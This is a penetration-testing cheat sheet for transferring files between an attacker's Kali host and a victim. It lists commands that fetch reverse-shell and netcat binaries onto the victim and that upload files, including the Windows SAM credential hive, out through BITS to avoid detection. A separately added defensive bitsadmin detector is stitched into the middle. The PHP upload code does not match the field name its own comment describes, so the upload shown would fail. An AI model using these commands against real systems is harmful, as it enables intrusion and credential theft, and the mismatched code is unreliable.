Cheat sheet for transferring (downloading/uploading) files between machines.
💡 On Windows, C:\ProgramData is often writable.
Web server
💡 Use updog, a replacement for SimpleHTTPServer that allows upload!
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.x
python3 -m http.server 80
sudo service apache2 start
Transfer binary files (convert to ascii)
Optional: Compress binary file
Use an executable packer (PE compression tool). The file is still executable after!
cd /home/kali/share
upx -9 nc.exe
Convert binary file to ascii
exe2hex -x nc.exe -p nc.cmd
Transfer the file using any other method.
Reconstruct the binary file
The last command runs in PowerShell and reconstructs the binary file.
.\nc.cmd
FTP
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
ftp anonymous@x.x.x.x
wget
Proxy configuration
nano /etc/wgetrc
http_proxy = http://127.0.0.1:3128
use_proxy = on
Download file in current directory
wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
Download folder
wget -r "https://whatever/foldernameendingwithaslash/"
curl
curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
axel
Download accelerator.
axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
netcat
See Netcat.
Powershell
See Powershell Cheat Sheet for more examples.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"
scp (secure copy)
scp [OPTION] [[user@]SRC_HOST:]file1 [[user@]DEST_HOST:]file2
sudo service ssh start
Windows (victim) to Kali
scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/
Linux (victim) to Kali
scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/
Background Intelligent Transfer Service (BITS) on Windows
💡 Useful to evade detection since BITS is used for Windows Updates.
Download file
bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
Upload file
bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP%\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
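From the defender's side, the bitsadmin chains above are visible in process-creation logs even though the transfer itself rides on BITS. The following is an added example, not part of the original cheat sheet. It assumes the whole chain is logged as one command line, and the allow-list, path hints and sample events are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: update hosts expected in this environment; tune locally.
ALLOWED_SUFFIXES = (".microsoft.com", ".windowsupdate.com")
# User-writable locations named on this page.
WRITABLE_HINTS = ("%temp%", r"c:\programdata")

ADDFILE = re.compile(r"bitsadmin(?:\.exe)?\s+/addfile\s+(\S+)\s+(\S+)\s+(\S+)", re.I)
UPLOAD = re.compile(r"bitsadmin(?:\.exe)?\s+/create\s+/upload\s+(\S+)", re.I)

def analyze(cmdline):
    """Return one finding per /addfile in a command line, with the reasons it is suspicious."""
    upload_jobs = {job.lower() for job in UPLOAD.findall(cmdline)}
    findings = []
    for job, remote, local in ADDFILE.findall(cmdline):
        local = local.strip('"')
        url = urlparse(remote)
        host = (url.hostname or "").lower()
        reasons = []
        # Prefixing "." lets the bare domain match its own suffix entry.
        if not ("." + host).endswith(ALLOWED_SUFFIXES):
            reasons.append("remote host not on allow-list")
        if url.scheme.lower() != "https":
            reasons.append("not HTTPS")
        if job.lower() in upload_jobs:
            reasons.append("upload job (data leaving the host)")
        if local.lower().startswith(WRITABLE_HINTS):
            reasons.append("user-writable local path")
        findings.append({"job": job, "remote": remote, "local": local, "reasons": reasons})
    return findings

# Constructed process-creation command lines (192.0.2.0/24 is a documentation range).
SAMPLE_EVENTS = [
    r'cmd /c "bitsadmin /create JOB & bitsadmin /addfile JOB http://192.0.2.10/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB"',
    r'cmd /c "bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://192.0.2.10/SAM %TEMP%\Data\SAM & bitsadmin /resume JOB"',
    r'cmd /c "bitsadmin /create WU & bitsadmin /addfile WU https://download.windowsupdate.com/a/update.cab C:\Windows\Temp\update.cab"',
]

def suspicious(events):
    """Keep only findings that have at least one reason attached."""
    return [f for e in events for f in analyze(e) if f["reasons"]]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_EVENTS):
        print(f["job"], f["remote"], "->", f["local"], "|", "; ".join(f["reasons"]))
```

If the log source records each bitsadmin.exe invocation as its own event, group events by parent process before calling `analyze` so the `/create /upload` and `/addfile` steps are seen together.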
Impacket
See Impacket.
- Start SMB server on Kali Linux. See this post.
- On the Windows machine, copy file from Kali
💡 Supports binary file transfer. SEE ALSO impacket-wmiexec!!
On Kali
sudo impacket-smbserver myshare /home/kali/share
On Windows
net view \\<KALI IP>
dir \\<KALI IP>\<sharename>
copy <source> <destination>
copy <filename> \\<KALI IP>\<sharename>\<filename>
copy \\<KALI IP>\<sharename>\<filename> <filename>
PHP File Upload
On Kali, host a file upload page on Apache Web Server.
sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploads
sudo service apache2 start
upload.php
sudo nano /var/www/html/upload.php
<?php
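// Files are stored under uploads/ using only the base name of the submitted file name.
$target_dir = "uploads/";
// The $_FILES key must match the field name the client sends;
// .NET WebClient.UploadFile sends the file in a field named "file".
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file);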
?>
upload.html
sudo nano /var/www/html/upload.html
<html>
<head></head>
<body>
<form action="./upload.php" method="POST" enctype="multipart/form-data">
File<br>
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">
</form>
</body>
</html>
On the victim
Open a web browser and go to http://<KALI_IP>/upload.html
powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')